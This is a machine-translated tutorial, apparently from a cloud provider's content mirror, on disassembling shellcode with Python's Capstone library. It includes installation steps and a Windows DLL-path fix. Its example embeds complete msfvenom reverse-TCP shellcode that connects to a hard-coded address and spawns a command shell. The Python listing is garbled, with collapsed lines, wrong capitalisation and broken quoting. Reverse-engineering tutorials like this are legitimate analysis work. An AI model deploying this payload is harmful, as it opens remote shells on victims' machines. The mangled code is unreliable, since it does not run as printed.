"Python" uses Python to convert Shellcode into a compilation

Source: Internet
Author: User
Tags python script kali linux

1. Introduction

How many lines of code do you need to convert hex into disassembly?
Thanks to the Python Capstone Library, it only takes five elements to do this.
In binary analysis, when exploit development or reverse engineering is performed, it is necessary to quickly decompile the hexadecimal shellcode into disassembly. You can use an anti-compilation tool like OllyDbg or Ida Pro, but if you don't want to perform this small task with a mature anti-compilation tool, the following Python code will help you convert the shellcode into an disassembly form

If you have not installed capstone, then you need to install it using the following methods:

2. Installation 2.1, based on Debian

Use the following command to download and install.
Note: There is already a Kali Linux.

 apt-get install python-capstone
2.2. Windows-based

Windows needs to download the following MSI file after you run the Graphical Wizard to install it:
+ bit

https://github.com/aquynh/capstone/releases/download/3.0.5-rc2/capstone-3.0.5-rc2-python-win32.msi

A Bit

https://github.com/aquynh/capstone/releases/download/3.0.5-rc2/capstone-3.0.5-rc2-python-win64.msi
3. Example

This example is a reverse TCP connection that was picked out from Msfvenom shellcode

#!/usr/bin/env pythonfrom Capstone Import *shellcode = "Shellcode + =" \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\ x64\x8b "Shellcode + =" \x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7 "Shellcode + =" \x4a\x26\x31\xff\xac\x3c\ X61\X7C\X02\X2C\X20\XC1\XCF "Shellcode + =" \x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c "Shellcode + =" \x8b\ x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01 "Shellcode + =" \xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\ X31 "Shellcode + =" \xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d "Shellcode + =" \xf8\x3b\x7d\x24\x75\xe4\x58\ x8b\x58\x24\x01\xd3\x66 "Shellcode + =" \x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0 "Shellcode + =" \x89\x44\ x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f "Shellcode + =" \x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68 " Shellcode + = "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8" Shellcode + = "\x90\x01\x00\x00\x29\xc4\x54\x50\ x68\x29\x80\x6b\x00 "Shellcode + =" \xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f "shellCode + = "\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xc0\xa8\x74\x80\x68" Shellcode + = "\x02\x00\x1f\x90\x89\xe6\x6a\x10\x56\ X57\x68\x99\xa5 "Shellcode + =" \x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec "Shellcode + =" \x68\xf0\xb5\xa2\ x56\xff\xd5\x68\x63\x6d\x64\x00\x89 "Shellcode + =" \xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66 "Shellcode + = "\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44" Shellcode + = "\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\ x53\x56\x68 "Shellcode + =" \x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30 "Shellcode + =" \x68\x08\x87\x1d\x60\ xff\xd5\xbb\xaa\xc5\xe2\x5d\x68 "Shellcode + =" \xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0 "shellcode + =" \ X75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5 "MD = Cs (cs_arch_x86, cs_mode_32) for I in Md.disasm (Shellcode, 0x00): Print ("0x%x:\t%s\t%s"% (i.address, i.mnemonic, I.op_str))

Code Explanation:

md = Cs(CS_ARCH_X86, CS_MODE_32): 初始化类,给两个参数(硬件架构和硬件模式)for i in md.disasm(shellcode, 0x00):  disasm 反汇编这段HEX, 它的参数是shellcode和起始地址。print(“0x%x:\t%s\t%s” %(i.address, i.mnemonic, i.op_str)):打印地址和操作数。
4. Results

Save the above code and execute it, and the following screen shows a compilation of Hex (shellcode) output in Python script

Figure: Converting hex to disassembly with a simple Python script

5. Practice part

I encountered an error while installing Capstone.
The error message is as follows:

Traceback (most recent call last):  File "sl.py", line 2, in <module>    from capstone import *  File "C:\Python27\lib\site-packages\capstone\__init__.py", line 249, in <module>    raise ImportError("ERROR: fail to load the dynamic library.")ImportError: ERROR: fail to load the dynamic library.

All the way down to debug, and finally found that the cTYPES load DLL when the error, do not know why.

C:\Python27\Lib\site-packages\capstone\__init__.py

So I manually changed the 210-line code lib path to the absolute path of the DLL.

    _lib = "capstone.dll" # 修改前    _lib = "C:\\Python27\\lib\\site-packages\\capstone\\lib\\capstone.dll" # 修改后

The modified code is as follows:

if sys.platform == ‘darwin‘:    _lib = "libcapstone.dylib"elif sys.platform in (‘win32‘, ‘cygwin‘):    _lib = "C:\\Python27\\lib\\site-packages\\capstone\\lib\\capstone.dll"else:    _lib = "libcapstone.so"
6, the results after the operation of the practice

7. Reference
https://haiderm.com/convert-hex-assembly-using-simple-python-script/

"Python" uses Python to convert Shellcode into a compilation

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.